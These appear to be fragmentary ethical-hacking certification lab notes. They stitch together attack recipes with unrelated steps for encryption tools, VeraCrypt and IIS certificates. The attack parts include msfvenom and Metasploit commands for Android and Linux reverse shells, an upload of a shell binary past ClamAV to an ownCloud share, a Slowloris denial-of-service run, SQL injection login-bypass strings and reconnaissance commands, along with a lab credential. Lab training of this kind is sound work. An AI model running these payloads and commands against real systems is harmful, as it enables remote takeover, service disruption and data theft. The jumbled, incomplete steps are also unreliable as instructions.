Host the payload and run a listener on Kali
Type use exploit/multi/handler.
Type set payload android/meterpreter/reverse_tcp.
Type set LHOST
Start listener, type exploit -j -z
Browse link of file to start meterpreter session.
Exploit Execute
Open kali hosted link. Download APK using es file downloader. Install and run.
Using owncloud
Hosted at ubuntu machine admin:qwerty@123
Create users and share files to users.
Install Desktop client and share and view files
ClamAV Protection of cloud
Cloud is currently protected by ClamAV so no malicious file is uploaded.
Bypassing ClamAV
msfvenom -p linux/x86/shell/reverse_tcp LHOST= LPORT=4444 --platform linux -f elf > /root/Desktop/exploit.elf | generate a linux based executable
Type use multi/handler
Type set payload linux/x86/shell/reverse_tcp
Type set LHOST
Type set LPORT 4444
Type run
Upload payload in shared folder.
Download using admin, Set permission to chmod -R 755 exploit.elf
Execute exploit ./exploit.elf DOS Attack using script
Open Slowloris folder
Run chmod 777
Execute script ./ -dns
DOS attack successful
Easy to use GUI based. Supports text and files
Easy to use, integrates with explorer right click. Right Click any file and select MD5 Calculator to calculate its MD5 Hash.
Install and it will appear as an encrypt when right clicking on files.
To Encrypt open cryptoforge text and enter your text here and use a passphrase to encrypt
Simple GUI based. Enter text and encode it using password.
Open inetmgr
Click machine name and select Server Certificates
From actions select Create Self signed Certificate
Choose Name and Personal.
Go to a Site, choose Bindings from the Action pane.
Select Add.
Select Https, IP, hostname, select the certificate.
Go the site and right click refresh one time.
Create Encrypted containers which can be mounted as Virtual Disks.
Create Volume Create an Encrypted File Container Standard VeraCrypt volume Volume Location (Path to save the container) Encryption AES Hash SHA-512 Size of Volume Enter Password Generate mouse randomness Format Exit
Mount Volume
Select Drive Letter Select File Mount Enter Password Disk shown in Explorer
CrypTool – Data Encryption
File New Enter Text Encrypt/Decrypt Symmetric (Modern) RC2 KEY 05 Encrypt File Open Encrypt/Decrypt Symmetric (Modern) RC2 KEY 05 Decrypt
python -m SimpleHTTPServer | Starts a quick HTTP server in the current directory
admin' -- admin' # admin'/* ' or 1=1-- ' or 1=1# ' or 1=1/*
') or '1'='1--
') or ('1'='1—
netdiscover -i eth0 <subnet>
cewl -d 2 -m 5 -w docswords.txt
CEH LABS Wordlist file is placed in Module 13 labs folder
Last updated